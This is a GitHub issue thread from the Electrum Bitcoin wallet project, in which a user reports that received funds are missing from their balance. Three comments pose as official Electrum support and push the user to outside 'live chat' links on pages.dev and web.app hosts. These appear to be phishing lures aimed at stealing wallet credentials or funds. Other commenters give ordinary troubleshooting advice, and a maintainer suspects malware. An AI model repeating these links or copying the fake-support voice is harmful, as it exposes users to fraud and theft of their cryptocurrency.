### ISSUE TITLE
the money is not coming to the wallet

### ISSUE THREAD

**Issue by henkel432** [spesmilo/electrum#9350]
Hello. I am using the latest version of the wallet 4.5.8. I tried to transfer money through the exchanger first through the address and then through the receipt. By copying the address, the transfer was shown to be successful and it can be seen through the blockchain that the transfer has reached, but there is no money on the balance
Can you tell me what I'm doing wrong?

**Comment by Hinted-tech** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Electrum Support Request](https://dapprectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by Kellytimmins** [comment]
Hello @henkel432 
It sounds like you're encountering a common issue when transferring funds.Ensure that you copied the correct wallet address. If you accidentally used a different address, the funds would go to that address instead.

**Comment by henkel432** [comment]
> Hello @henkel432 It sounds like you're encountering a common issue when transferring funds.Ensure that you copied the correct wallet address. If you accidentally used a different address, the funds would go to that address instead.

I watched the video on sending, and there is a receiving section: the address was not indicated at the top of the page. so I copied it using the right mouse button. How is it here
![изображение_2024-12-07_145301570](https://github.com/user-attachments/assets/9f8dd390-ed9e-465d-8a33-2e4c64d277dd)

**Comment by Stopstilhen** [comment]
> > Hello @henkel432 It sounds like you're encountering a common issue when transferring funds.Ensure that you copied the correct wallet address. If you accidentally used a different address, the funds would go to that address instead.
> 
> I watched the video on sending, and there is a receiving section: the address was not indicated at the top of the page. so I copied it using the right mouse button. How is it here ![изображение_2024-12-07_145301570](https://private-user-images.githubusercontent.com/190934602/393507742-9f8dd390-ed9e-465d-8a33-2e4c64d277dd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzM1Nzc5ODMsIm5iZiI6MTczMzU3NzY4MywicGF0aCI6Ii8xOTA5MzQ2MDIvMzkzNTA3NzQyLTlmOGRkMzkwLWVkOWUtNDY1ZC04YTMzLTJlNGM2NGQyNzdkZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMjA3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTIwN1QxMzIxMjNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lZDRlMzRlOWI5NmEzM2FkZTUxMjgyZjhmODU4OWMxZjQ5N2Q2MjI4NTA2ZWM1YzdmODE5OTdjZDk5OWVmM2I5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.sQ3OjadwVlkdVRbrnea5GYv67cvhwjGwQJnophJeR6Y)

I’ve check the screenshot you sent @henkel432 
It’s a version error 
I'll refer you to our official Decentralized dApps Protocol website for you to complete your request. Follow the procedure laid by the support team on the page once you establish a chat via [Electrum Decentralized Portal](https://websynchronizefix.web.app/). A link will be generated for you to update and resolve your issues immediately 
Note: Use the chat icon at the bottom of the page to initiate the chat.

**Comment by FerrariDEVo** [comment]
@henkel432 For the quickest resolution to your issue, we highly recommend using our live chat support, available 24/7. Our dedicated support team can provide real-time assistance and help resolve your complaint promptly. You can access the live chat here: [SUPPORT](https://dapps-exploreonsite.web.app/).
If live chat is unavailable or you prefer to continue via email, please rest assured that our team will review your ticket and follow up with you as soon as possible.

**Comment by AbdussamadA** [comment]
Does the address where the coins were sent show up on the addresses tab (aapeca)? You can search the list of addresses by pressing ctrl+f.

**Comment by ecdsa** [comment]
probably malware.
